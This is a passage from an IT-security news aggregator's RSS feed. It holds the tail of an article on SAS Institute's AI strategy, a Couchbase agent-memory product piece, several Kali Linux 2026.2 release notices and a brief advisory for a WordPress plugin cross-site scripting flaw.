<p>From an initial 150 customers using the software when it was still an NCSU project, SAS’s customer base has grown to about 80,000 sites in 150 countries.</p>



<p>The company, headquartered in Cary, North Carolina since 1980, may not be a household name, but its software is behind functions such as data analysis in clinical trials at large pharmaceutical companies, pricing strategy at large retailers, and anti-money laundering and fraud detection efforts in many banks. Over the years, companies in virtually every industry, from aerospace and environmental protection to retail and manufacturing, have used SAS in areas such as data management, risk management, governance, decision intelligence, marketing, and fraud management.</p>



<h2 class="wp-block-heading">Ease of use</h2>



<p>And now, like many other software vendors, <a href="https://www.cio.com/article/3988330/sas-enters-new-ai-era-with-ipo-on-the-horizon.html">SAS is incorporating AI into its offering</a>. Goodnight has a healthy skepticism of some applications of the technology, saying, “people are spending a lot of money guessing the next best word to use in a sentence.” At SAS, the focus is on <a href="https://www.infoworld.com/article/3980674/sas-supercharges-viya-platform-with-ai-agents-copilots-and-synthetic-data-tools.html">using AI to make its software easier to use</a> and its answers more self-explanatory in a way that doesn’t leave customers with unexpected bills.</p>



<p>Unlike some other vendors, he said, “When you do a call to AI, it actually comes back to SAS, and we run it here at no charge to the customer, so we tried to add all of our AI capabilities without charging anything for them, because we have the domain expertise.”</p>



<p>The accelerating rate of technology change has been good for SAS, according to its CTO, Bryan Harris. “I think it’s pushed us harder,” he said.</p>



<h2 class="wp-block-heading">Applying AI with care</h2>



<p>While SAS is adopting AI, he said, “we have to be relevant in the hype of a new technology, and most importantly, incredibly relevant in the reality of that technology.” That means spurning things like tokenmaxing, which he called a “vanity metric,” and focusing on business impact and financial responsibility.</p>


<div class="extendedBlock-wrapper block-coreImage right"><figure class="wp-block-image alignright size-full is-resized"> width="800" height="800" sizes="auto, (max-width: 800px) 100vw, 800px"&gt;<figcaption class="wp-element-caption"><p>SAS Institute CTO Bryan Harris</p>
</figcaption></figure><p class="imageCredit">SAS</p></div>



<p>“When you start talking about automating business processes in your world with agents, and there is a somewhere between 10% to 30% error rate in those, that is not a good thing, and not something customers can put their careers on,” Harris said. “So, what we show them is how to overcome that error rate, and how we use our technology to do that, and that you need to understand the risks of the technology so you apply it in the right use cases and areas that are appropriate for the business.”</p>



<p>In addition to improving the <a href="https://www.infoworld.com/article/3980674/sas-supercharges-viya-platform-with-ai-agents-copilots-and-synthetic-data-tools.html">accuracy</a> and <a href="https://www.cio.com/article/4164659/sas-makes-ai-governance-the-centerpiece-of-its-agent-strategy.html">governance of AI agents</a>, Harris said other R&amp;D focuses are on physical AI, digital twins, and quantum computing.</p>



<h2 class="wp-block-heading">Institutional memory</h2>



<p>While the company’s technology has evolved with the times, some things have been consistent, he added. The SAS value system and its people-centric leadership style remain in place, and have repeatedly put the company on the Best Places to Work lists in the US and globally.</p>



<p>“I think we’ve built a great culture,” said Goodnight, now 83. “I hope the ones that carry us forward will remember how to treat people, how to be good to people, and how to pay people well. I hope we see it continue in the future.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best VPN for Laptop Use in 2026]]></title>
<description><![CDATA[If you take your laptop with you everywhere you go, you need the best VPN for laptop use — one that protects your data when connecting to public Wi-Fi hotspots and lets you access blocked websites, no matter where you are connecting from. Let’s find out the best VPNs for laptops. The online marke...]]></description>
<link>https://tsecurity.de/de/3637190/betriebssysteme/best-vpn-for-laptop-use-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637190/betriebssysteme/best-vpn-for-laptop-use-in-2026/</guid>
<pubDate>Wed, 01 Jul 2026 03:38:24 +0200</pubDate>
<category>🖥️  Betriebssysteme</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you take your laptop with you everywhere you go, you need the best VPN for laptop use — one that protects your data when connecting to public Wi-Fi hotspots and lets you access blocked websites, no matter where you are connecting from. Let’s find out the best VPNs for laptops. The online market is […]</p>
<p>The post <a rel="nofollow" href="https://www.addictivetips.com/vpn/best-vpn-for-laptop/">Best VPN for Laptop Use in 2026</a> appeared first on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicherheitslücken ohne Ende: Menge an KI-Bug-Reports überfordert Github - Golem.de]]></title>
<description><![CDATA[KI-Einsatz in der IT-Sicherheit: Pentesting, Schwachstellenscans, Reporting – virtueller · IT Sicherheitstests und Ethical Hacking mit Kali Linux (E- ...]]></description>
<link>https://tsecurity.de/de/3636996/it-security-nachrichten/sicherheitsluecken-ohne-ende-menge-an-ki-bug-reports-ueberfordert-github-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636996/it-security-nachrichten/sicherheitsluecken-ohne-ende-menge-an-ki-bug-reports-ueberfordert-github-golemde/</guid>
<pubDate>Wed, 01 Jul 2026 00:23:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-Einsatz in der <b>IT</b>-<b>Sicherheit</b>: Pentesting, Schwachstellenscans, Reporting – virtueller · IT Sicherheitstests und Ethical Hacking mit Kali Linux (E- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[E-Autos: Tesla-Batterien aus Nevada-Fabrik gestohlen - Golem.de]]></title>
<description><![CDATA[... SecurityKIEnergie. E-Autos: Tesla-Batterien aus Nevada-Fabrik ... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ...]]></description>
<link>https://tsecurity.de/de/3636495/it-security-nachrichten/e-autos-tesla-batterien-aus-nevada-fabrik-gestohlen-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636495/it-security-nachrichten/e-autos-tesla-batterien-aus-nevada-fabrik-gestohlen-golemde/</guid>
<pubDate>Tue, 30 Jun 2026 19:53:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Security</b>KIEnergie. E-Autos: Tesla-Batterien aus Nevada-Fabrik ... <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Controller angreifbar: Forscher warnt vor manipulierbaren Verkehrsschildern - Golem.de]]></title>
<description><![CDATA[IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... Seminar: IT-Security-Awareness für Systemadministratoren: virtueller Ein-Tages- ...]]></description>
<link>https://tsecurity.de/de/3636179/it-security-nachrichten/controller-angreifbar-forscher-warnt-vor-manipulierbaren-verkehrsschildern-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636179/it-security-nachrichten/controller-angreifbar-forscher-warnt-vor-manipulierbaren-verkehrsschildern-golemde/</guid>
<pubDate>Tue, 30 Jun 2026 18:09:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... Seminar: <b>IT</b>-<b>Security</b>-Awareness für Systemadministratoren: virtueller Ein-Tages- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents need context everywhere they run, even where the cloud can't follow]]></title>
<description><![CDATA[The competitive edge in enterprise AI is shifting to context: which platform can give an agent the right memory, the right retrieval and the right data at the moment of decision.Couchbase on Tuesday announced its AI Data Plane, combining persistent agent memory, real-time context retrieval and an...]]></description>
<link>https://tsecurity.de/de/3636043/it-nachrichten/ai-agents-need-context-everywhere-they-run-even-where-the-cloud-cant-follow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636043/it-nachrichten/ai-agents-need-context-everywhere-they-run-even-where-the-cloud-cant-follow/</guid>
<pubDate>Tue, 30 Jun 2026 17:03:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The competitive edge in enterprise AI is shifting to context: which platform can give an agent the right memory, the right retrieval and the right data at the moment of decision.</p><p>Couchbase on Tuesday announced its AI Data Plane, combining persistent agent memory, real-time context retrieval and an enterprise-managed MCP server in a single operational platform. </p><p>Couchbase's roots are in <a href="https://venturebeat.com/ai/enterprise-ai-gets-closer-to-data-with-couchbases-new-capella-ai-services">caching and high-transaction databases</a> — an architecture the company argues makes it better suited for agent memory than vendors that came to the problem from search or analytics. The AI Data Plane runs identically across cloud, on-premises and disconnected edge environments, extending agent memory and local vector search to devices with no network connection.</p><p>"How do you make sure that the intelligence that you get out of these models are the ones that databases specialize in?" Gopi Duddi, CTO at Couchbase, told VentureBeat. "How can you get that value out of storage systems, which are still going to be databases?"</p><h2>What the AI Data Plane delivers</h2><p>The AI Data Plane packages three components designed to replace the fragmented stacks most enterprises are currently running.</p><p><b>Agent memory:</b> A unified persistence layer for conversational context, structured operational data and vector embeddings. Couchbase says the guardrails are what distinguish it from standalone memory services: token constraints per session, time-to-live limits on stored memories and metering controls that cap compute consumption per agent session.</p><p><b>Enterprise MCP server:</b> An enterprise-supported self-managed server for standardized model-context protocol integration, shipping as part of the platform rather than requiring a separate service.</p><p><b>Agent catalog:</b> A function-level catalog of discoverable agent tooling built by Couchbase. Duddi distinguished it from metadata catalogs like Databricks Unity or AWS Glue — describing it, in his words, as closer to a glorified MCP that surfaces agent functions as callable tools within the platform.</p><h2>Memory-first architecture takes agent context to the disconnected edge</h2><p>The lineage of Couchbase and its core architectural foundation is what Duddi says gives it an edge when it comes to context.</p><p>"We were a cache before we became a database," Duddi said.</p><p>Writing to memory is 10x faster than writing to disk, Duddi said — a speed advantage he argues separates Couchbase from NoSQL databases that layer memory workloads on top of disk-based storage.</p><p>Couchbase isn't the only data technology that has its roots in a caching layer. Redis similarly is rooted in cache and also<a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits"> recently announced</a> an agentic AI context layer. Duddi argued that Couchbase is different in that it maintains an ACID (Atomicity, Consistency, Isolation, and Durability) compliant database which matters for transactional workloads. Couchbase also has a long history across multiple deployment modalities.</p><p>That architecture extends to the edge through Couchbase Lite, the platform's on-device runtime. It runs SQL, full-text search and vector search locally without a network connection, using a proprietary sync mechanism to replicate bidirectionally back to cloud or between edge nodes when connectivity returns. The target environments are retail floor operations, field service, industrial deployments and regulated settings where agent data cannot leave the device.</p><p>Duddi cited hotel reservations as an early example: multiple agents serving customers concurrently, each pulling local context and running vector search on-device, with shared session memory synchronizing centrally. The practical benefit is token efficiency. Rather than every agent independently retrieving and processing the same data, the platform caches shared context so concurrent sessions draw on it without burning tokens repeatedly.</p><h2>Agora's view from production</h2><p>Agora, a platform that helps developers embed real-time voice, video and conversational AI into enterprise applications, has run Couchbase in production since February 2024.</p><p>The initial use case was its Signaling product, managing channel setup and state synchronization for live calls. Expanding into conversational AI agents brought stricter requirements: memory-first architecture, full JSON support for storage and query, cross-datacenter replication for high availability and enterprise-grade vendor support.</p><p>"Couchbase was the best fit based on these criteria," Patrick Ferriter, SVP of Product at Agora, told VentureBeat.</p><p>Agora is now extending that relationship to support context retrieval for conversational AI agents.</p><p>"This will simplify the architecture and deliver enterprise grade RAG with predictable lower latency required for conversational AI use cases," Ferriter said.</p><p>For data professionals trying to figure out the best approach to context, there is no one answer. On platform selection, Ferriter was direct.</p><p>"It depends on the preference and goals of the organization, including timing," Ferriter  said. "If they want something enterprise grade and optimal for immediate production and scale vs. having to optimize and maintain an open-source solution with community support. We wanted the former and that is why we looked at an expanded partnership with Couchbase."</p><h2>Competitive context: following the right trend</h2><p>The context layer has become a crowded space in 2025.</p><p>Oracle put a<a href="https://venturebeat.com/data/oracle-converges-the-ai-data-stack-to-give-enterprise-agents-a-single"> memory core</a> in its database back in March providing a context layer. Redis added a<a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits"> context layer</a> in May as did vector-native database vendor<a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next"> Pinecone</a>.  </p><p>"Couchbase is following this trend, not setting it, but it's the right one to follow," Devin Pratt, Research Director for AI, Automation, Data and Analytics at IDC, told VentureBeat. "Its real edge is reach, running the same platform from cloud to edge to mobile, which is how enterprises actually operate. The test now is to scale against bigger names."</p><p>For teams navigating the vendor landscape, Pratt's framing is direct. "Match the tool to the workload. Consolidate where it makes sense, use a specialized engine like a graph database where relationship-heavy reasoning earns it, and let governance drive the call rather than treating memory as plumbing," Pratt said.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Forever chemicals’ are everywhere — but these companies are out to destroy them]]></title>
<description><![CDATA[Can we actually annihilate the toxic "forever chemicals" polluting our water and soil? The debut episode of GeekWire's Positive Charge podcast dives into the Herculean challenge of destroying PFAS — long-lived contaminants linked to serious health effects like cancer and immune suppression. Read ...]]></description>
<link>https://tsecurity.de/de/3635760/it-nachrichten/forever-chemicals-are-everywhere-but-these-companies-are-out-to-destroy-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635760/it-nachrichten/forever-chemicals-are-everywhere-but-these-companies-are-out-to-destroy-them/</guid>
<pubDate>Tue, 30 Jun 2026 15:32:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="945" src="https://cdn.geekwire.com/wp-content/uploads/2026/06/photo1-1260x945.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/06/photo1-1260x945.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2026/06/photo1-768x576.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2026/06/photo1-1536x1152.jpg 1536w, https://cdn.geekwire.com/wp-content/uploads/2026/06/photo1-2048x1536.jpg 2048w" sizes="(max-width: 1260px) 100vw, 1260px"><br>Can we actually annihilate the toxic "forever chemicals" polluting our water and soil? The debut episode of GeekWire's Positive Charge podcast dives into the Herculean challenge of destroying PFAS — long-lived contaminants linked to serious health effects like cancer and immune suppression. <a href="https://www.geekwire.com/2026/forever-chemicals-are-everywhere-but-these-companies-are-out-to-destroy-them/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 improves VM boot times]]></title>
<description><![CDATA[Offensive Security has released Kali Linux 2026.2 with faster boot times for penetration testers running the distribution in virtual machines. This article has been indexed from CyberMaterial Read the original article: Kali Linux 2026.2 improves VM boot times
Read more →
The post Kali Linux 2026....]]></description>
<link>https://tsecurity.de/de/3635564/it-security-nachrichten/kali-linux-20262-improves-vm-boot-times/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635564/it-security-nachrichten/kali-linux-20262-improves-vm-boot-times/</guid>
<pubDate>Tue, 30 Jun 2026 14:24:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Offensive Security has released Kali Linux 2026.2 with faster boot times for penetration testers running the distribution in virtual machines. This article has been indexed from CyberMaterial Read the original article: Kali Linux 2026.2 improves VM boot times</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/kali-linux-2026-2-improves-vm-boot-times/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/kali-linux-2026-2-improves-vm-boot-times/">Kali Linux 2026.2 improves VM boot times</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 veröffentlicht]]></title>
<description><![CDATA[Die neue Version Kali Linux 2026.2 bietet neun neue Werkzeuge, beschleunigte Bootzeiten in virtuellen Maschinen und Updates für die NetHunter-Plattform.

Tags: #Linux]]></description>
<link>https://tsecurity.de/de/3635246/it-security-nachrichten/kali-linux-20262-veroeffentlicht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635246/it-security-nachrichten/kali-linux-20262-veroeffentlicht/</guid>
<pubDate>Tue, 30 Jun 2026 12:39:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2026/04/Linux-Shutterstock-Shutterstock-634316555-1920.jpg" class="attachment-full size-full wp-post-image" alt="Linux" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2026/04/Linux-Shutterstock-Shutterstock-634316555-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2026/04/Linux-Shutterstock-Shutterstock-634316555-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2026/04/Linux-Shutterstock-Shutterstock-634316555-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2026/04/Linux-Shutterstock-Shutterstock-634316555-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2026/04/Linux-Shutterstock-Shutterstock-634316555-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Kali Linux 2026.2 veröffentlicht 3"></p>
    Die neue Version Kali Linux 2026.2 bietet neun neue Werkzeuge, beschleunigte Bootzeiten in virtuellen Maschinen und Updates für die NetHunter-Plattform.

<p>Tags: <a href="https://www.it-daily.net/thema/linux">#Linux</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 Release With new Hacking Tool and With Updated Desktop Environments]]></title>
<description><![CDATA[Kali Linux 2026.2 arrives on schedule in the final week of Q2 with a pragmatic blend of desktop environment refreshes, infrastructure hardening, and practical usability refinements that will matter to both pentesters and platform maintainers. The release emphasizes polish and…
Read more →
The pos...]]></description>
<link>https://tsecurity.de/de/3635238/it-security-nachrichten/kali-linux-20262-release-with-new-hacking-tool-and-with-updated-desktop-environments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635238/it-security-nachrichten/kali-linux-20262-release-with-new-hacking-tool-and-with-updated-desktop-environments/</guid>
<pubDate>Tue, 30 Jun 2026 12:38:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kali Linux 2026.2 arrives on schedule in the final week of Q2 with a pragmatic blend of desktop environment refreshes, infrastructure hardening, and practical usability refinements that will matter to both pentesters and platform maintainers. The release emphasizes polish and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/kali-linux-2026-2-release-with-new-hacking-tool-and-with-updated-desktop-environments/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/kali-linux-2026-2-release-with-new-hacking-tool-and-with-updated-desktop-environments/">Kali Linux 2026.2 Release With new Hacking Tool and With Updated Desktop Environments</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 Release With new Hacking Tool and With Updated Desktop Environments]]></title>
<description><![CDATA[Kali Linux 2026.2 arrives on schedule in the final week of Q2 with a pragmatic blend of desktop environment refreshes, infrastructure hardening, and practical usability refinements that will matter to both pentesters and platform maintainers. The release emphasizes polish and performance rather t...]]></description>
<link>https://tsecurity.de/de/3635203/it-security-nachrichten/kali-linux-20262-release-with-new-hacking-tool-and-with-updated-desktop-environments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635203/it-security-nachrichten/kali-linux-20262-release-with-new-hacking-tool-and-with-updated-desktop-environments/</guid>
<pubDate>Tue, 30 Jun 2026 12:22:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kali Linux 2026.2 arrives on schedule in the final week of Q2 with a pragmatic blend of desktop environment refreshes, infrastructure hardening, and practical usability refinements that will matter to both pentesters and platform maintainers. The release emphasizes polish and performance rather than headline-grabbing features: GNOME advances to version 50 and KDE Plasma to 6.6. […]</p>
<p>The post <a href="https://gbhackers.com/kali-linux-2026-2-release/">Kali Linux 2026.2 Release With new Hacking Tool and With Updated Desktop Environments</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11581 | Kali Forms Plugin up to 2.4.12 on WordPress cross site scripting (EUVD-2026-40261)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Kali Forms Plugin up to 2.4.12 on WordPress. The impacted element is an unknown function. Executing a manipulation can lead to cross site scripting.

This vulnerability appears as CVE-2026-11581. The attack may be performed from re...]]></description>
<link>https://tsecurity.de/de/3635159/sicherheitsluecken/cve-2026-11581-kali-forms-plugin-up-to-2412-on-wordpress-cross-site-scripting-euvd-2026-40261/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635159/sicherheitsluecken/cve-2026-11581-kali-forms-plugin-up-to-2412-on-wordpress-cross-site-scripting-euvd-2026-40261/</guid>
<pubDate>Tue, 30 Jun 2026 12:09:25 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/kali_forms_plugin">Kali Forms Plugin up to 2.4.12</a> on WordPress. The impacted element is an unknown function. Executing a manipulation can lead to cross site scripting.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-11581">CVE-2026-11581</a>. The attack may be performed from remote. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 released with 9 new tools, NetHunter updates]]></title>
<description><![CDATA[Kali Linux 2026.2, the second release of the year, is now available for download, featuring 9 new tools and numerous Kali NetHunter improvements. [...]]]></description>
<link>https://tsecurity.de/de/3635112/it-security-nachrichten/kali-linux-20262-released-with-9-new-tools-nethunter-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635112/it-security-nachrichten/kali-linux-20262-released-with-9-new-tools-nethunter-updates/</guid>
<pubDate>Tue, 30 Jun 2026 11:50:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kali Linux 2026.2, the second release of the year, is now available for download, featuring 9 new tools and numerous Kali NetHunter improvements. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 Released With New Tools for Pentesting and OSINT Workflows]]></title>
<description><![CDATA[The Kali Linux team has officially released Kali Linux 2026.2, arriving right on schedule at the close of Q2 2026. This release delivers a powerful combination of desktop environment upgrades, VM performance improvements, infrastructure modernization, and nine brand-new tools tailored for penetra...]]></description>
<link>https://tsecurity.de/de/3635083/it-security-nachrichten/kali-linux-20262-released-with-new-tools-for-pentesting-and-osint-workflows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635083/it-security-nachrichten/kali-linux-20262-released-with-new-tools-for-pentesting-and-osint-workflows/</guid>
<pubDate>Tue, 30 Jun 2026 11:37:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Kali Linux team has officially released Kali Linux 2026.2, arriving right on schedule at the close of Q2 2026. This release delivers a powerful combination of desktop environment upgrades, VM performance improvements, infrastructure modernization, and nine brand-new tools tailored for penetration testers and security researchers. Kali 2026.2 upgrades two major desktop environments to their […]</p>
<p>The post <a href="https://cyberpress.org/kali-linux-2026-2-released/">Kali Linux 2026.2 Released With New Tools for Pentesting and OSINT Workflows</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 trims VM boot times, refreshes its desktops]]></title>
<description><![CDATA[Penetration testers who run Kali Linux inside virtual machines boot their systems faster after the 2026.2 release. The change comes from a decision about graphics firmware, the code that drives NVIDIA, AMD, and Intel GPUs. That firmware has grown large…
Read more →
The post Kali Linux 2026.2 trim...]]></description>
<link>https://tsecurity.de/de/3635046/it-security-nachrichten/kali-linux-20262-trims-vm-boot-times-refreshes-its-desktops/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635046/it-security-nachrichten/kali-linux-20262-trims-vm-boot-times-refreshes-its-desktops/</guid>
<pubDate>Tue, 30 Jun 2026 11:23:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Penetration testers who run Kali Linux inside virtual machines boot their systems faster after the 2026.2 release. The change comes from a decision about graphics firmware, the code that drives NVIDIA, AMD, and Intel GPUs. That firmware has grown large…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/kali-linux-2026-2-trims-vm-boot-times-refreshes-its-desktops/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/kali-linux-2026-2-trims-vm-boot-times-refreshes-its-desktops/">Kali Linux 2026.2 trims VM boot times, refreshes its desktops</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 Released With 9 New Tools and VM Boot Tweaking]]></title>
<description><![CDATA[Kali Linux team officially released Kali Linux 2026.2 right on schedule at the close of Q2 2026, delivering a compelling mix of desktop environment upgrades, infrastructure modernization, VM performance enhancements, and nine brand-new tools for penetration testers and security researchers.…
Read...]]></description>
<link>https://tsecurity.de/de/3635041/it-security-nachrichten/kali-linux-20262-released-with-9-new-tools-and-vm-boot-tweaking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635041/it-security-nachrichten/kali-linux-20262-released-with-9-new-tools-and-vm-boot-tweaking/</guid>
<pubDate>Tue, 30 Jun 2026 11:23:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kali Linux team officially released Kali Linux 2026.2 right on schedule at the close of Q2 2026, delivering a compelling mix of desktop environment upgrades, infrastructure modernization, VM performance enhancements, and nine brand-new tools for penetration testers and security researchers.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/kali-linux-2026-2-released-with-9-new-tools-and-vm-boot-tweaking/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/kali-linux-2026-2-released-with-9-new-tools-and-vm-boot-tweaking/">Kali Linux 2026.2 Released With 9 New Tools and VM Boot Tweaking</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 trims VM boot times, refreshes its desktops]]></title>
<description><![CDATA[Penetration testers who run Kali Linux inside virtual machines boot their systems faster after the 2026.2 release. The change comes from a decision about graphics firmware, the code that drives NVIDIA, AMD, and Intel GPUs. That firmware has grown large enough to slow the early stages of startup, ...]]></description>
<link>https://tsecurity.de/de/3634957/it-security-nachrichten/kali-linux-20262-trims-vm-boot-times-refreshes-its-desktops/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634957/it-security-nachrichten/kali-linux-20262-trims-vm-boot-times-refreshes-its-desktops/</guid>
<pubDate>Tue, 30 Jun 2026 10:38:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Penetration testers who run Kali Linux inside virtual machines boot their systems faster after the 2026.2 release. The change comes from a decision about graphics firmware, the code that drives NVIDIA, AMD, and Intel GPUs. That firmware has grown large enough to slow the early stages of startup, and few virtual machines need it. Kali images traditionally shipped with a broad set of firmware so hardware worked out of the box. Graphics firmware alone now … <a href="https://www.helpnetsecurity.com/2026/06/30/kali-linux-2026-2-release/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/30/kali-linux-2026-2-release/">Kali Linux 2026.2 trims VM boot times, refreshes its desktops</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 Released With 9 New Tools and VM Boot Tweaking]]></title>
<description><![CDATA[Kali Linux team officially released Kali Linux 2026.2 right on schedule at the close of Q2 2026, delivering a compelling mix of desktop environment upgrades, infrastructure modernization, VM performance enhancements, and nine brand-new tools for penetration testers and security researchers. This ...]]></description>
<link>https://tsecurity.de/de/3634815/it-security-nachrichten/kali-linux-20262-released-with-9-new-tools-and-vm-boot-tweaking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634815/it-security-nachrichten/kali-linux-20262-released-with-9-new-tools-and-vm-boot-tweaking/</guid>
<pubDate>Tue, 30 Jun 2026 09:22:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kali Linux team officially released Kali Linux 2026.2 right on schedule at the close of Q2 2026, delivering a compelling mix of desktop environment upgrades, infrastructure modernization, VM performance enhancements, and nine brand-new tools for penetration testers and security researchers. This release bumps two major desktop environments to their latest versions. GNOME 50 arrives with […]</p>
<p>The post <a href="https://cybersecuritynews.com/kali-linux-2026-2-released/">Kali Linux 2026.2 Released With 9 New Tools and VM Boot Tweaking</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kartellbildung: Klage gegen DRAM-Hersteller wegen Speicherpreisen - Golem.de]]></title>
<description><![CDATA[Seminar: IT-Sicherheit für Webentwickler: virtueller Zwei-Tage-Workshop · E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E- ...]]></description>
